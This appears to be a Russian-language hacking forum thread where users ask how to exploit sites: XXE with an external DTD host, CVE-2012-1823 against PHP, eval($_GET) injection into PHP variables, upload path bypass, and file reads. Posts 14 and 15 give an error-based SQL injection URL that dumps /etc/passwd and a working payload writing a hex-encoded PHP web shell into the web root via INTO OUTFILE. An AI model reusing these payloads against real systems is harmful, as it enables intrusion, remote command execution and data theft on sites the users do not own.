Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    нет, враппера такого нет. стоит попробовать oob через ftp, http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
     
    _________________________
    Filipp likes this.
  2. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    Столкнулся с проблемой, парсер довольно древний, не поддерживает EXTERNAL ENTITY. Поднял у себя такое же окружение, даю ему такой xml:
    HTML:
    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE student [
      <!ENTITY % student SYSTEM "http://www.myhost.com/student.dtd">
      %student;
    ]>
    Получаю ответ:
    Code:
    ex.xml:4: parser error : PEReference: %student; not found
      %student;
               ^
    ex.xml:6: parser error : Start tag expected, '<' not found
    
    ^
    XML::Simple called at ./run.pl line 6.
    
    В новой версии парсера такой проблемы нет. Стоит отметить, такой XML прожевывает:
    Code:
    <?xml version="1.0"?>
    <!DOCTYPE author [
      <!ELEMENT author (#PCDATA)>
      <!ENTITY email "[email protected]">
    
      <!--the following use of a general entity is legal if it
        is used in the XML document-->
      <!ENTITY js "Jo Smith &email;">
    ]>
    <author>&js;</author>
    В таком случае можно что-нибудь предпринять?
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    ну а где у вас тег <student>?
     
    _________________________
  4. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    Это пример из документации. Я как только не пробовал, external entity отказывается обрабатывать. На парсере версии чуть повыше все пашет. Работает только если создать сущность и сослаться на нее в каком-нибудь теге
     
  5. Ruslan1993it

    Ruslan1993it Member

    Joined:
    24 Jun 2012
    Messages:
    72
    Likes Received:
    23
    Reputations:
    0
    Используется следующее:
    Code:
    80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
    
    PHP/5.3.10-1ubuntu3.25
    Использую CVE-2012-1823
    > Exploit completed, but no session started.
    Порты открыты, в чем проблема?
     
  6. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Есть возможность записать в переменные произвольный текст.
    Code:
    <?PHP
    $mail = "";
    $data = "05.05.2015";
    ?>
    Но вот проблема, max кол-во символов 15 на каждую переменную.
    p.s
    @`$c` - пробовал
     
    #1586 WallHack, 17 Dec 2016
    Last edited: 17 Dec 2016
  7. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
  8. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    #1588 WallHack, 17 Dec 2016
    Last edited: 17 Dec 2016
  9. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    )

    $mail = "eval($_GET[1]);"; - Так не будет работать

    $mail = ""; $a1=eval($_GET[l]); echo "$a1"; - Так будет


    ----------
    Не актуально, нашел решения
     
    #1589 WallHack, 17 Dec 2016
    Last edited: 17 Dec 2016
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    рассказал бы что ли
     
  11. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Как-то так

    Code:
    <?
    $mail = "phpinfo";
    $data = "";$mail();//";
    ?>
     
  12. Rastamanka

    Rastamanka Elder - Старейшина

    Joined:
    26 Nov 2008
    Messages:
    429
    Likes Received:
    11
    Reputations:
    7
    Добрый день.
    Есть вот такой скрипт.
    PHP:
    $uploaddir 'dir/';
    $uploadfile $uploaddir basename($_FILES['userfile']['name']);

    if (
    move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
      echo 
    "good";
    }

    Есть ли возожность как-то обойти basename т.к. директории dir нету, то надо загрузить файл выше директорией)
     
  13. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    Apache 2.2.22
    phpMyAdmin 3.4.11.1 (есть доступ, без прав на создание бд и загрузку)
    SquirrelMail 1.4.23
    на ip видит около 5ти сайтов, имеем wordpress 4.4.2 (wpscan - http://pastebin.com/WuysyCNL)

    PHP/5.4.45-0+deb7u1
    В http://site/phpmyadmin/setup/ могу создать сервер без проблем - http://imgur.com/a/SxnIN

    Что можно осуществить с этим? Некоторые вещи пробовал, но хочу выслушать ваши предложения
     
    #1593 foozzione, 22 Dec 2016
    Last edited: 22 Dec 2016
  14. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    Добрый подскажите как применить into outfile
    При таком запросе:
    Code:
    http://localhost/'||(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select load_file(0x2f6574632f706173737764) from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'
    
    Результат:
    Duplicate entry 'root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin' for key 1 
    Как в таком запросе внедрить?
    select '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/html/UserFiles/shell.php'
     
  15. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
    http://localhost/'||(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select код шелла в hex from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'

    в твоем примере:

    http://localhost/'||(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select 0x3C3F7068702073797374656D28245F4745545B22636D64225D293B203F3E from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'
    если current_user file_priv=Y



    попробуй
     
  16. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    Уже разобрался мои варианты не работали из-за того что там нет прав на запись((
     
  17. myblitz

    myblitz New Member

    Joined:
    18 Aug 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    На сайте имеется XSS. На сайте стоит бейзик авторизация ( .htpasswd )
    Насколько реально получить Request > Authorization > value ?
    [​IMG]
     
    #1597 myblitz, 29 Dec 2016
    Last edited: 29 Dec 2016
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    не получится
     
    _________________________
  19. Zmaster_

    Zmaster_ New Member

    Joined:
    5 Apr 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Код:
    $html = @file_get_contents($_GET['param'] . '?q=' . $q);
    echo $html;

    Могу передать любой param и $q, хочу прочитать конфиг движка. Но проблема, как видим, в том что добавляется '?q=' . $q к пути, следовательно путь становится не корректным. Что можно сделать?
     
  20. weleor

    weleor Banned

    Joined:
    23 Oct 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Привет, есть blind sql inj, могу читать файлы, но факт в том, что не все, то-есть /etc/passwd, /etc/mysql/my.cnf/, /etc/hosts читаются без проблем, а вот файл index.php не хочет, и конфиги апача тоже не видит, хотя путь 100% верный, так-как есть phpinfo() файл и через него все видно.